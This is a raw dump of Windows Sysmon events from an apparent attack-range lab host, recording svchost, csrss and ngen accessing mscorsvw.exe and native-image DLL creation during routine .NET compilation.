13:51:31.459{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8D04-00000000A301}4548C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:31.412{59A5CD1D-9263-6005-8C04-00000000A301}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\129c-0\System.Web.Routing.dll2021-01-18 13:51:31.412 10341000x80000000000000008806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.381{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8C04-00000000A301}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.366{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8C04-00000000A301}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.366{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8C04-00000000A301}4764C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.287{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8B04-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.272{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8B04-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.272{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8B04-00000000A301}4508C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:31.225{59A5CD1D-9263-6005-8A04-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c08-0\System.Web.RegularExpressions.dll2021-01-18 13:51:31.225 10341000x80000000000000008799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.100{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8A04-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.084{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8A04-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.084{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8A04-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.053{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9263-6005-8904-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.037{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9263-6005-8904-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:31.037{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9263-6005-8904-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008816Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:32.991{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9264-6005-8F04-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008815Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:32.991{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9264-6005-8F04-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008814Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:32.881{59A5CD1D-9263-6005-8E04-00000000A301}4572C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11dc-0\System.Windows.Controls.Ribbon.dll2021-01-18 13:51:32.881 10341000x80000000000000008820Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:33.116{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9265-6005-9004-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008819Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:33.100{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9265-6005-9004-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008818Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:33.100{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9265-6005-9004-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008817Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:32.991{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9264-6005-8F04-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000008821Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:34.944{59A5CD1D-9265-6005-9004-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\bd4-0\System.Windows.Forms.DataVisualization.dll2021-01-18 13:51:34.944 10341000x80000000000000008845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.850{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9267-6005-9704-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.850{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9267-6005-9704-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:35.850{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9267-6005-9704-00000000A301}4812C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.3031